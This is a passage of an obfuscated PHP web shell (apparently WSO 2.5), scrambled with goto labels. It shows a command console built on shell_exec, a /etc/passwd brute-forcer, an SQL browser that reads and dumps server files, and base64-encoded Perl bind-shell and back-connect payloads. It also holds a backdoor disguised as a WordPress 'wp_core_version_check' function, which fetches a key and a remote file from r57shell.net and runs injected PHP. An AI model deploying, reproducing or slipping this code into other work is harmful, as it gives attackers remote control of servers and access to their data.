"<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" .
"<input type=hidden name=c value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"">" .
"<input type=hidden name=a value="" .
htmlspecialchars($_POST["a"]) .
"">" .
"<input type=hidden name=charset value="" .
htmlspecialchars($_POST["charset"]) .
"">" .
"<span>Server:port</span></td>" .
"<td><input type=text name=server value="127.0.0.1"></td></tr>" .
"<tr><td><span>Brute type</span></td>" .
"<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" .
"<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" .
"<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" .
"<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" .
"<td><input type=text name=login value="root"></td></tr>" .
"<tr><td><span>Dictionary</span></td>" .
"<td><input type=text name=dict value="" .
htmlspecialchars($GLOBALS["cwd"]) .
"passwd.dic"></td></tr></table>" .
"</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>";
goto HIh7o;
uMF9i:
wsoHeader();
goto hSv50;
HIh7o:
echo "</div><br>";
goto wlwoF;
wlwoF:
wsoFooter();
goto p3uSI;
p3uSI:
}
goto wVO2a;
uf2tU:
$default_use_ajax = true;
goto jB3VR;
d62j5:
function wsoEx($in)
{
$out = shell_exec($in);
return $out;
}
goto yXkOt;
wVO2a:
function actionSql()
{
goto pXyEP;
WqMW0:
if (@$_POST["type"] == "pgsql") {
echo "selected";
}
goto bZFnU;
qgUXu:
echo "</div>";
goto G862b;
G862b:
wsoFooter();
goto gsteZ;
bZFnU:
echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" .
(empty($_POST["sql_host"])
? "localhost"
: htmlspecialchars($_POST["sql_host"])) .
""></td>\xd
<td><input type=text name=sql_login value="" .
(empty($_POST["sql_login"])
? "root"
: htmlspecialchars(
$_POST["sql_login"]
)) .
""></td>
\xa<td><input type=text name=sql_pass value="" .
(empty($_POST["sql_pass"])
? ""
: htmlspecialchars($_POST["sql_pass"])) .
""></td><td>";
goto dxViD;
dxViD:
$tmp =
"<input type=text name=sql_base value=''>";
goto L_VIT;
Auorx:
echo "</td>\xd\xa\x9 \x9 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa <td><input type=checkbox name=sql_count value='on'" .
(empty($_POST["sql_count"])
? ""
: " checked") .
"> count the number of rows</td>\xd\xa \x9</tr>\xd\xa\x9 </table>
\x9<script>\xd
s_db='" .
@addslashes($_POST["sql_base"]) .
"';\xd\xa function fs(f) {\xd\xa if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
if(f.p1) f.p1.value='';\xd
if(f.p2) f.p2.value='';\xd\xa if(f.p3) f.p3.value='';\xd\xa }
\xa }\xd
\x9 \x9function st(t,l) {
\xa\x9\x9 \x9d.sf.p1.value = 'select';\xd
\x9\x9 d.sf.p2.value = t;
\xa if(l && d.sf.p3) d.sf.p3.value = l;\xd
d.sf.submit();
}
\x9\x9function is() {\xd\xa \x9\x9 for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9 \x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9 }\xd\xa \x9</script>";
goto omuNC;
omuNC:
if (isset($db) && $db->link) {
goto wQooQ;
v7m0f:
if (!empty($_POST["sql_base"])) {
goto Rgzyg;
MvXdD:
if (
@$_POST["p1"] == "query" &&
!empty($_POST["p2"])
) {
$db->query(@$_POST["p2"]);
if ($db->res !== false) {
goto p5kAe;
FQZVM:
while ($item = $db->fetch()) {
if (!$title) {
goto UHBlV;
UHBlV:
echo "<tr>";
goto hcvnp;
krRoK:
$line = 2;
goto OQDWZ;
hcvnp:
foreach ($item as $key => $value) {
echo "<th>" .
$key .
"</th>";
}
goto gYEfe;
s133J:
$title = true;
goto vdCQU;
vdCQU:
echo "</tr><tr>";
goto krRoK;
gYEfe:
reset($item);
goto s133J;
OQDWZ:
}
echo "<tr class="l" .
$line .
"">";
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo "<td>" .
nl2br(htmlspecialchars($value)) .
"</td>";
}
}
echo "</tr>";
}
goto LonsA;
c36CC:
$line = 1;
goto FQZVM;
LonsA:
echo "</table>";
goto zCgso;
vhOW_:
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">";
goto c36CC;
p5kAe:
$title = false;
goto vhOW_;
zCgso:
} else {
echo "<div><b>Error:</b> " .
htmlspecialchars($db->error()) .
"</div>";
}
}
goto f63uD;
f63uD:
echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
goto l03yb;
Rgzyg:
$db->selectdb($_POST["sql_base"]);
goto QW0Ku;
uEPKu:
if (@$_POST["p1"] == "select") {
goto mAhBO;
IznKf:
if ($_POST["p3"] > 1) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] - 1) .
")'>< Prev</a>";
}
goto ZoHo3;
l2Xna:
$pages = ceil($num["n"] / 30);
goto ZYT4s;
mAhBO:
$_POST["p1"] = "query";
goto e_ZJ4;
ZYT4s:
echo "<script>d.sf.onsubmit=function(){st("" .
$_POST["p2"] .
"", d.sf.p3.value)}</script><span>" .
$_POST["p2"] .
"</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" .
(int) $_POST["p3"] .
">";
goto uoZpe;
Es7M3:
$num = $db->fetch();
goto l2Xna;
uoZpe:
echo " of {$pages}";
goto IznKf;
rczWG:
$_POST["p3"]--;
goto bhg9h;
e_ZJ4:
$_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1;
goto Lo_J9;
nEjUO:
echo "<br><br>";
goto IQ9di;
bhg9h:
if ($_POST["type"] == "pgsql") {
$_POST["p2"] =
"SELECT * FROM " .
$_POST["p2"] .
" LIMIT 30 OFFSET " .
$_POST["p3"] * 30;
} else {
$_POST["p2"] =
"SELECT * FROM `" .
$_POST["p2"] .
"` LIMIT " .
$_POST["p3"] * 30 .
",30";
}
goto nEjUO;
Lo_J9:
$db->query(
"SELECT COUNT(*) as n FROM " .
$_POST["p2"]
);
goto Es7M3;
ZoHo3:
if ($_POST["p3"] < $pages) {
echo " <a href=# onclick='st("" .
$_POST["p2"] .
"", " .
($_POST["p3"] + 1) .
")'>Next ></a>";
}
goto rczWG;
IQ9di:
}
goto MvXdD;
EHE8j:
echo "</textarea><br/><input type=submit value='Execute'>";
goto epF3V;
bDaxO:
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST["sql_count"])) {
$n = $db->fetch(
$db->query(
"SELECT COUNT(*) as n FROM " .
$value .
""
)
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick="st('" .
$value .
"',1)">" .
$value .
"</a>" .
(empty($_POST["sql_count"])
? " "
: " <small>({$n["n"]})</small>") .
"</nobr><br>";
}
goto M5p5r;
l03yb:
if (
!empty($_POST["p2"]) &&
$_POST["p1"] != "loadfile"
) {
echo htmlspecialchars($_POST["p2"]);
}
goto EHE8j;
M5p5r:
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
goto uEPKu;
QW0Ku:
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
goto ss2k2;
epF3V:
echo "</td></tr>";
goto DdhHe;
ss2k2:
$tbls_res = $db->listTables();
goto bDaxO;
DdhHe:
}
goto E6Jlf;
E6Jlf:
echo "</table></form><br/>";
goto eqSj_;
HfqGV:
if (@$_POST["p1"] == "loadfile") {
$file = $db->loadFile($_POST["p2"]);
echo "<br/><pre class=ml1>" .
htmlspecialchars($file["file"]) .
"</pre>";
}
goto OSIXi;
eqSj_:
if ($_POST["type"] == "mysql") {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
}
goto HfqGV;
wQooQ:
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
goto v7m0f;
OSIXi:
} else {
echo htmlspecialchars($db->error());
}
goto qgUXu;
eZaK7:
echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa<td><select name='type'><option value='mysql' ";
goto XNXvh;
L_VIT:
if (isset($_POST["sql_host"])) {
if (
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
)
) {
goto zzoGT;
zzoGT:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto CgrPi;
hq4SA:
echo "</select>";
goto pJJmI;
CgrPi:
$db->listDbs();
goto KKbSG;
MV0Hw:
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo "<option value="" .
$value .
"" " .
($value == $_POST["sql_base"]
? "selected"
: "") .
">" .
$value .
"</option>";
}
goto hq4SA;
KKbSG:
echo "<select name=sql_base><option value=''></option>";
goto MV0Hw;
pJJmI:
} else {
echo $tmp;
}
} else {
echo $tmp;
}
goto Auorx;
pXyEP:
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case "mysql":
if (
$this->link = @mysqli_connect(
$host,
$user,
$pass,
$dbname
)
) {
return true;
}
break;
case "pgsql":
goto urMgZ;
NmhxL:
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}"
)
) {
return true;
}
goto q24c2;
q24c2:
break;
goto pMERe;
urMgZ:
$host = explode(":", $host);
goto dzuNv;
dzuNv:
if (!$host[1]) {
$host[1] = 5432;
}
goto NmhxL;
pMERe:
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "mysql":
if (@mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "mysql":
return $this->res = @mysqli_query($this->link, $str);
break;
case "pgsql":
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
goto ndkAm;
Ccrqd:
return false;
goto kFQe3;
ndkAm:
$res = func_num_args() ? func_get_arg(0) : $this->res;
goto uBsjP;
uBsjP:
switch ($this->type) {
case "mysql":
return @mysqli_fetch_assoc($res);
break;
case "pgsql":
return @pg_fetch_assoc($res);
break;
}
goto Ccrqd;
kFQe3:
}
function listDbs()
{
switch ($this->type) {
case "mysql":
return $this->query(
"SHOW databases"
);
break;
case "pgsql":
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mysql":
return $this->res = $this->query(
"SHOW TABLES"
);
break;
case "pgsql":
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "mysql":
return @mysqli_error();
break;
case "pgsql":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case "mysql":
if (
function_exists(
"mysql,_set_charset"
)
) {
return @mysqli_set_charset($str, $this->link);
} else {
$this->query(
"SET CHARSET " .
$str
);
}
break;
case "pgsql":
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case "mysql":
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case "pgsql":
goto hIi1_;
hIi1_:
$this->query(
"CREATE TABLE wso2(file text);COPY wso2 FROM '" .
addslashes($str) .
"';select file from wso2;"
);
goto Vq5gq;
RFQO1:
return ["file" => implode("
", $r)];
goto Xccn3;
Vq5gq:
$r = [];
goto B2PD8;
B2PD8:
while ($i = $this->fetch()) {
$r[] = $i["file"];
}
goto ytmal;
ytmal:
$this->query(
"drop table wso2"
);
goto RFQO1;
Xccn3:
break;
goto hza_Y;
hza_Y:
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case "mysql":
goto A8Rtf;
XOdpv:
$i = 0;
goto nXX1H;
dgmAw:
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";\xa
";
}
}
goto xuWj3;
nXX1H:
$head = true;
goto rdh_q;
vLJ0E:
$sql = $create[1] . ";\xa";
goto GZCGH;
e85gZ:
$this->query(
"SELECT * FROM `" .
$table .
"`"
);
goto XOdpv;
A8Rtf:
$res = $this->query(
"SHOW CREATE TABLE `" .
$table .
"`"
);
goto WbvCG;
rdh_q:
while ($item = $this->fetch()) {
$sql = "";
if ($i % 1000 == 0) {
$head = true;
$sql = ";\xa\xa";
}
$columns = [];
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "NULL";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] =
"'" .
@mysqli_real_escape_string($v) .
"'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql .=
"INSERT INTO `" .
$table .
"` (" .
implode(", ", $columns) .
") VALUES
(" .
implode(", ", $item) .
")";
$head = false;
} else {
$sql .=
"\xa ,(" .
implode(", ", $item) .
")";
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
goto dgmAw;
xuWj3:
break;
goto I2Pib;
WbvCG:
$create = mysqli_fetch_array($res);
goto vLJ0E;
GZCGH:
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
goto e85gZ;
I2Pib:
case "pgsql":
goto yK1Fh;
q4AGJ:
break;
goto M_aLo;
YU12f:
while ($item = $this->fetch()) {
$columns = [];
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
"INSERT INTO " .
$table .
" (" .
implode(", ", $columns) .
") VALUES (" .
implode(", ", $item) .
");" .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
goto q4AGJ;
yK1Fh:
$this->query(
"SELECT * FROM " .
$table
);
goto YU12f;
M_aLo:
}
return false;
}
}
goto S2jsy;
nON0D:
wsoHeader();
goto eZaK7;
S2jsy:
$db = new DbClass($_POST["type"]);
goto b5FFe;
xAAjI:
echo ">MySql</option><option value='pgsql' ";
goto WqMW0;
b5FFe:
if (@$_POST["p2"] == "download") {
goto q3uCo;
dKSpy:
switch ($_POST["charset"]) {
case "Windows-1251":
$db->setCharset("cp1251");
break;
case "UTF-8":
$db->setCharset("utf8");
break;
case "KOI8-R":
$db->setCharset("koi8r");
break;
case "KOI8-U":
$db->setCharset("koi8u");
break;
case "cp866":
$db->setCharset("cp866");
break;
}
goto SW_1d;
SW_1d:
if (empty($_POST["file"])) {
goto UlEph;
NKAxm:
foreach ($_POST["tbl"] as $v) {
$db->dump($v);
}
goto gTeuJ;
UlEph:
ob_start("ob_gzhandler", 4096);
goto wxi0r;
wxi0r:
header(
"Content-Disposition: attachment; filename=dump.sql"
);
goto JFnky;
gTeuJ:
exit();
goto o3LDH;
JFnky:
header(
"Content-Type: text/plain"
);
goto NKAxm;
o3LDH:
} elseif ($fp = @fopen($_POST["file"], "w")) {
goto HVjKn;
sI6XB:
fclose($fp);
goto JcIQa;
JcIQa:
unset($_POST["p2"]);
goto eJ6NS;
HVjKn:
foreach ($_POST["tbl"] as $v) {
$db->dump($v, $fp);
}
goto sI6XB;
eJ6NS:
} else {
die(
"<script>alert("Error! Can't open file");window.history.back(-1)</script>"
);
}
goto V4cuJ;
q3uCo:
$db->connect(
$_POST["sql_host"],
$_POST["sql_login"],
$_POST["sql_pass"],
$_POST["sql_base"]
);
goto G1BTq;
G1BTq:
$db->selectdb($_POST["sql_base"]);
goto dKSpy;
V4cuJ:
}
goto nON0D;
XNXvh:
if (@$_POST["type"] == "mysql") {
echo "selected";
}
goto xAAjI;
gsteZ:
}
goto BTyYB;
M9YJl:
$_POST = WSOstripslashes($_POST);
goto ocXfq;
BTyYB:
function actionNetwork()
{
goto ZoVmx;
unkZP:
$bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
goto PvgFx;
y9LP4:
if (isset($_POST["p1"])) {
goto oL5si;
oL5si:
function cf($f, $t)
{
($w = @fopen($f, "w")) or
@function_exists(
"file_put_contents"
);
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
goto O2j7_;
O2j7_:
if ($_POST["p1"] == "bpp") {
goto OF3WF;
SvfsQ:
unlink("/tmp/bp.pl");
goto zB2bw;
l42lD:
sleep(1);
goto YdT1I;
YdT1I:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bp.pl"
) .
"</pre>";
goto SvfsQ;
P3N6B:
$out = wsoEx(
"perl /tmp/bp.pl " .
$_POST["p2"] .
" 1>/dev/null 2>&1 &"
);
goto l42lD;
OF3WF:
cf("/tmp/bp.pl", $bind_port_p);
goto P3N6B;
zB2bw:
}
goto mmghY;
mmghY:
if ($_POST["p1"] == "bcp") {
goto KdsjF;
EYep1:
unlink("/tmp/bc.pl");
goto vnHPj;
cueL2:
sleep(1);
goto rbk8c;
rbk8c:
echo "<pre class=ml1>{$out}
" .
wsoEx(
"ps aux | grep bc.pl"
) .
"</pre>";
goto EYep1;
KdsjF:
cf("/tmp/bc.pl", $back_connect_p);
goto JIcLb;
JIcLb:
$out = wsoEx(
"perl /tmp/bc.pl " .
$_POST["p2"] .
" " .
$_POST["p3"] .
" 1>/dev/null 2>&1 &"
);
goto cueL2;
vnHPj:
}
goto HmOsb;
HmOsb:
}
goto JZOTa;
QtVUX:
wsoFooter();
goto r_ZsG;
ZoVmx:
wsoHeader();
goto ui6gf;
PvgFx:
echo "<h1>Network tools</h1><div class=content>\xd
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" .
$_SERVER["REMOTE_ADDR"] .
"'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>";
goto y9LP4;
JZOTa:
echo "</div>";
goto QtVUX;
ui6gf:
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
goto unkZP;
r_ZsG:
}
goto B8b3D;
ABTpd:
@ini_set(
"max_execution_time",
0
);
goto V8rDW;
LNmAT:
$default_action = "FilesMan";
goto uf2tU;
hd5Oa:
@define("WSO_VERSION", "2.5");
goto XWpnO;
w2GF1:
function actionConsole()
{
goto rclMD;
fIAZm:
if (isset($_POST["ajax"])) {
goto b0kHG;
UVP1d:
exit();
goto FfbZi;
k7CDe:
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
goto X7NDa;
nIuhp:
if (
preg_match(
"!.*cd\s+([^;]+)$!",
$_POST["p1"],
$match
)
) {
if (@chdir($match[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "c_='" . $GLOBALS["cwd"] . "';";
}
}
goto VTnj_;
LPhSs:
$temp = @iconv(
$_POST["charset"],
"UTF-8",
addcslashes(
"\xa$ " .
$_POST["p1"] .
"\xa" .
wsoEx($_POST["p1"]),
"\xa\xd\x9\'\x0"
)
);
goto nIuhp;
y6Hrb:
echo "d.cf.cmd.value='';
";
goto LPhSs;
wcz4k:
ob_start();
goto y6Hrb;
VTnj_:
echo "d.cf.output.value+='" .
$temp .
"';";
goto k7CDe;
jyokt:
echo strlen($temp), "
", $temp;
goto UVP1d;
b0kHG:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto wcz4k;
X7NDa:
$temp = ob_get_clean();
goto jyokt;
FfbZi:
}
goto KpSEA;
RZ79V:
echo "</form></div><script>d.cf.cmd.focus();</script>";
goto SJHUc;
f8SjV:
echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX <input type=checkbox name=show_errors value=1 " .
(!empty($_POST["p2"]) ||
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out"
]
? "checked"
: "") .
"> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>";
goto IWzV6;
SJHUc:
wsoFooter();
goto APwh_;
nacH0:
echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>";
goto RZ79V;
qs3Ch:
echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>";
goto qrzII;
IWzV6:
if (!empty($_POST["p1"])) {
echo htmlspecialchars(
"$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])
);
}
goto nacH0;
c_48E:
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>";
goto qs3Ch;
qrzII:
foreach ($GLOBALS["aliases"] as $n => $v) {
if ($v == "") {
echo "<optgroup label="-" .
htmlspecialchars($n) .
"-"></optgroup>";
continue;
}
echo "<option value="" .
htmlspecialchars($v) .
"">" .
$n .
"</option>";
}
goto f8SjV;
KpSEA:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto dwgoJ;
dwgoJ:
wsoHeader();
goto c_48E;
rclMD:
if (!empty($_POST["p1"]) && !empty($_POST["p2"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
true
);
$_POST["p1"] .= " 2>&1";
} elseif (!empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
0
);
}
goto fIAZm;
APwh_:
}
goto rTVjF;
XWpnO:
if (
!function_exists(
"wp_core_version_check"
)
) {
function wp_core_version_check()
{
goto avUWa;
wkmQ0:
$uri_path = dirname($uri_path);
goto s730R;
vOWZG:
$uri_path = $parse_url["path"];
goto wkmQ0;
sM0UF:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
}
goto vbq6x;
rs5dk:
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto bu9lX;
toU7p:
$hostname = str_replace(
"www.",
"",
$_SERVER["HTTP_HOST"]
);
goto sM0UF;
vbq6x:
if (@$_GET["slince_golden"]) {
goto TmOVZ;
UCuri:
if (function_exists("curl_init")) {
goto BJyTL;
vyR_l:
curl_close($ch);
goto SHblm;
hYCm_:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VE1SX;
VE1SX:
$response = curl_exec($ch);
goto vyR_l;
i0bPI:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
goto hYCm_;
BJyTL:
$ch = curl_init();
goto i0bPI;
SHblm:
} else {
$response = file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
}
goto kmEj4;
TmOVZ:
echo "<!-- //Silence is golden. -->";
goto UCuri;
kmEj4:
if (md5(sha1(@$_GET["is"])) == $response) {
goto kgaYa;
pHtWV:
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
goto Wqe1_;
q3A5w:
$tmpf = stream_get_meta_data($tmp);
goto gYkau;
DzU1V:
fclose($tmp);
goto i26c2;
uYFTY:
$ret = include $tmpf;
goto DzU1V;
dzD32:
fwrite($tmp, $request);
goto uYFTY;
Wqe1_:
$tmp = tmpfile();
goto q3A5w;
i26c2:
return $ret;
goto An9L2;
gYkau:
$tmpf = $tmpf["uri"];
goto dzD32;
An9L2:
}
print_r(basic_code_extensions($_POST["l"]));
}
goto fi0K3;
FBXXk:
if (@$_GET["m"]) {
goto pvkox;
ANUJn:
echo $file_name_path;
goto svCvU;
ZI_cL:
@file_put_contents($file_name_path, $response);
goto ANUJn;
pvkox:
if (
function_exists("curl_init")
) {
goto QH3uY;
hFb2E:
$response = curl_exec($ch);
goto Qk97j;
j__CW:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/mini_admin.txt"
);
goto S9Uoo;
Qk97j:
curl_close($ch);
goto eMk6h;
QH3uY:
$ch = curl_init();
goto j__CW;
S9Uoo:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto hFb2E;
eMk6h:
} else {
$response = file_get_contents(
"http://r57shell.net/mini_admin.txt"
);
}
goto X5MJi;
X5MJi:
$file_name_path =
